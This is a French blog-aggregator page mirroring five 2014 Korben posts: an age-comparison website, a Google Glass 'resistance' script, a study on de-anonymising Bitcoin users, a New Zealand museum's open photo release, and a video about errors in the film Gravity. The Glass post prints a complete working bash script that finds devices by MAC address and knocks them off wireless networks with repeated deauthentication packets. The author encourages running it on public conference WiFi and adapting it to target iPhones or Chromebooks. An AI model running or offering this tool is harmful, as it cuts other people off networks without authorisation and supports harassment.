PROJET AUTOBLOG


Korben

source: Korben

⇐ retour index

Mise à jour

Mise à jour de la base de données, veuillez patienter...

Vous devenez vieux !

samedi 7 juin 2014 à 11:10

Si vous vous sentez encore jeune, allez jeter un oeil au site You're getting old !

Après que vous avez entré votre date de naissance, ce site mettra en perspective votre âge avec divers événements, des distances, le nombre de battements de votre cœur, votre nombre de respirations, et surtout le graph de fin qui vous donnera en pourcentages, le nombre de personnes plus jeunes qui ont utilisé ce site avant vous.

old Vous devenez vieux !

Voici les événements majeurs qui se sont déroulés durant mon enfance  et l'âge que j'avais au moment des faits :

  • 2nd Apr 1982 Argentina invades the Falkland Islands (you were 10 days old)
  • 11th Jun 1982 E.T. the Extra-Terrestrial, American science fiction film by Steven Spielberg is released (you were 2 months old)
  • 17th Aug 1982 The first compact discs (CDs) are released to the public (you were 4 months old)
  • 19th Sep 1982 The first emoticons are posted by Scott Fahlman (you were 5 months old)
  • 6th Oct 1982 Madonna's first single "Everybody" is released (you were 6 months old)
  • 2nd Dec 1983 Michael Jackson's Thriller is released (you were 1 year old)
  • 7th Jun 1984 American comedy movie Ghostbusters is released (you were 2 years old)
  • 28th Jan 1986 The Space Shuttle Challenger disaster (you were 3 years old)
  • 22nd Nov 1986 Mike Tyson wins his first world boxing title by defeating Trevor Berbick in Las Vegas (you were 4 years old)
  • 23rd Jun 1991 The first Sonic the Hedgehog game is published by Sega (you were 9 years old)

Hé oui, j'avais 1 an quand Michael Jackson a sorti Thriller et 9 ans quand Sonic est sorti... ;-)

À tester d'urgence

Cet article merveilleux et sans aucun égal intitulé : Vous devenez vieux ! ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Combattre les Google Glass

jeudi 5 juin 2014 à 11:04

A tous ceux qui détestent les Google Glass parce qu'on ne sait jamais si celui qui les porte est en train de vous photographier ou vous filmer, Julian Oliver a une solution pour entrer en résistance.

Il a mis au point un script baptisé Glasshole.sh capable de détecter la présence de Google Glass sur un réseau local (même si vous n'êtes pas admin de ce réseau) et de les bannir définitivement. Le script fait un scan ARP sur le réseau, récupère les adresses MAC des machines, détectent celles qui appartiennent aux Google Glass, fait un biiiiip, puis force la déconnexion des Google Glass grâce à aireplay-ng qui lance des paquets de désauthentification. Ensuite, ça tourne en permanence pour les empêcher de se reconnecter.

#!/bin/bash
#
# GLASSHOLE.SH
#
# Find and kick Google Glass devices from your local wireless network.  Requires
# 'beep', 'arp-scan', 'aircrack-ng' and a GNU/Linux host.  Put on a BeagleBone
# black or Raspberry Pi. Plug in a good USB wireless NIC (like the TL-WN722N)
# and wear it, hide it in your workplace or your exhibition.
#
# Save as glasshole.sh, 'chmod +x glasshole.sh' and exec as follows:
#
#   sudo ./glasshole.sh <WIRELESS NIC> <BSSID OF ACCESS POINT>
 
shopt -s nocasematch # Set shell to ignore case
 
NIC=$1 # Your wireless NIC
BSSID=$2 # Network BSSID (exhibition, workplace, park)
MAC=$(/sbin/ifconfig | grep $NIC | head -n 1 | awk '{ print $5 }')
GGMAC='F8:8F:CA:24' # May change as new editions of Google Glass are released 
POLL=30 # Check every 30 seconds
 
airmon-ng stop mon0 # Pull down any lingering monitor devices
airmon-ng start $NIC # Start a monitor device
 
echo '
   ___           _ __    __                     __             __        __   
  / _ \___  ___ ( ) /_  / /  ___   ___ _  ___ _/ /__ ____ ___ / /  ___  / /__ 
 / // / _ \/ _ \|/ __/ / _ \/ -_) / _ `/ / _ `/ / _ `(_-<(_-</ _ \/ _ \/ / -_)
/____/\___/_//_/ \__/ /_.__/\__/  \_,_/  \_, /_/\_,_/___/___/_//_/\___/_/\__/ 
                                        /___/                                 
'
 
while true;
    do  
        for TARGET in $(arp-scan -I $NIC --localnet | grep -o -E \
        '([[:xdigit:]]{1,2}:){5}[[:xdigit:]]{1,2}')
           do
               if [[ $TARGET == *$GGMAC* ]]
                   then
                       # Audio alert
                       beep -f 1000 -l 500 -n 200 -r 2
                       echo "Glasshole discovered: "$TARGET
                       echo "De-authing..."
                       aireplay-ng -0 1 -a $BSSID -c $TARGET mon0 
                    else
                        echo $TARGET": is not a Google Glass. Leaving alone.."
               fi
           done
           echo "None found this round."
           sleep $POLL
done
airmon-ng stop mon0

Bon évidemment, si le porteur des lunettes connectées passe via sa connexion 4G, ça ne servira à rien, mais si vous voulez faire chier les porteurs de Google Glass qui se connectent au WiFi public lors d'une conférence, vous pouvez trimballer ce script sur une petite machine Linux genre un Raspberry Pi et rigoler dans votre barbe. Pensez quand même à désactiver le biiiiip car vous allez vite vous faire griller.

Notez que vous pouvez aussi adapter le script pour bannir d'autres appareils que les Google Glass... Au hasard les Chromebook ou les iPhones ;-)

Vous trouverez le script ici.

Source

Cet article merveilleux et sans aucun égal intitulé : Combattre les Google Glass ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Bitcoin – Pas si anonyme que ça sur le réseau ?

jeudi 5 juin 2014 à 10:11

Des chercheurs de l'Université du Luxembourg viennent de publier une étude (PDF) qui explique une série d'attaques permettant d'associer le hash utilisé lors d'une transaction Bitcoin avec l'adresse IP réelle de l'utilisateur.

Cela fonctionne même si l'utilisateur est derrière un routeur qui fait du NAT (et qui partage donc une seule IP publique avec de nombreuses personnespersonnes) et il est même possible de déjouer l'utilisation de TOR pour révéler l'adresse IP.

Bon, c'est assez technique, mais en gros, quand votre client Bitcoin se connecte au réseau, il établit au minimum 8 connexions au réseau Bitcoin. Grâce à leur méthode, les chercheurs peuvent déterminer avec un fort taux de certitude quelles sont ces 8 connexions et relier les transactions sortantes de ces serveurs avec votre adresse IP simplement en analysant l'activité sur le réseau.

The crucial idea of our attack is to identify each client by an octet of outgoing connections it establishes. This octet of bitcoin peers (entry nodes) serves as a unique identifier of a client for the whole duration of a user session and will differentiate even those users who share the same NAT IP address. We showed that most of these connections can be learned if the attacker maintains connections to a majority of Bitcoin servers. Then we show that the transaction propagation rules imply that the entry nodes will be among the rest that report the transaction to the attacker. As soon as the attacker receives the transaction from just 2-3 entry nodes he can with very high probability link the transaction to a specific client.

Après, pour ceux qui passent via TOR, les chercheurs ont mis au point une autre méthode qui permet de détourner la protection anti DDoS du réseau Bitcoin pour lui faire bannir le plus possible de noeud TOR. Une fois que TOR est blacklisté, les transactions passent en direct et ils peuvent alors exploiter leur méthode pour associer le hash Bitcoin à l'IP.

Le coût d'une telle attaque serait d'après eux de 1500 euros maximum.

Concrètement, cette méthode permet d'affirmer que même derrière le réseau TOR, personne ne peut être entièrement anonyme sur le réseau Bitcoin. Avec un peu de matos, il semble relativement simple de cibler un hash afin de trouver de quelle IP une transaction est partie et par conséquent, trouver qui en est à l'origine.

Ceux qui utilisent Bitcoin à des fins de blanchiment d'argent ont donc du souci à se faire.

Source

Cet article merveilleux et sans aucun égal intitulé : Bitcoin – Pas si anonyme que ça sur le réseau ? ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Le Musée de la Nouvelle Zélande libère 30 000 photos

jeudi 5 juin 2014 à 09:20

Si vous êtes prof de science, d'histoire ou que vous aimez tout simplement trainer dans les musées, j'ai une bonne nouvelle pour vous. Le Musée de la Nouvelle-Zélande Te Papa Tongarewa (ce qui veut dire "Le lieu des trésors de cette terre") vient de libérer sous licence Creative Commons ou dans le domaine public, plus de 30 000 photos de ses pièces.

On y retrouve des choses comme une importante collection de fossiles, un herbier gigantesque, des photos d'animaux en tout genre, mais aussi des choses un peu plus contemporaines comme des robes, des oeuvres d'art ou des timbres. Bref, un peu tout ce qui concerne le pays, les Maoris et le Pacifique en général.

Vous pouvez, au choix, effectuer des recherches via le moteur en n'oubliant pas de cocher la case "with downloadable images" ou alors partir carrément en exploration et flâner de collections en collection.

musee nouvelle zelande libere 30 000 photos Le Musée de la Nouvelle Zélande libère 30 000 photos

Et si vous aimez le poisson et les fruits de mer, vous serez heureux d'apprendre que le Colossal Squid, l'une des pièces maitresses de ce musée est aussi visible ici.

musee nouvelle zelande libere 30 000 photos1 Le Musée de la Nouvelle Zélande libère 30 000 photos

Il s'agit d'un calamar géant (mort) de 4,2 mètres de long, pesant 495 kg et rapporté par des pêcheurs au musée en 2007. Vraiment impressionnant.

Bref, une bonne nouvelle pour ceux qui s'intéressent à l'art et aux sciences. En tout cas une excellente initiative qui devrait être copiée par tous les musées du monde.

 

Cet article merveilleux et sans aucun égal intitulé : Le Musée de la Nouvelle Zélande libère 30 000 photos ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.

Les boulettes de Gravity vues par Neil deGrasse Tyson

jeudi 5 juin 2014 à 08:42

Comme beaucoup de personnes, j'ai vraiment adoré le film Gravity alors je vais vous en remettre une couche avec cette vidéo réalisée par CinemaSins qui passe en revue tout ce qui déconne dans le film... Le truc amusant, c'est qu'en même temps, l'astrophysicien américain Neil deGrasse Tyson apporte lui aussi ses commentaires éclairés sur les scènes du film.

C'est en anglais, mais très drôle à regarder.

Source et photo

Cet article merveilleux et sans aucun égal intitulé : Les boulettes de Gravity vues par Neil deGrasse Tyson ; a été publié sur Korben, le seul site qui t'aime plus fort que tes parents.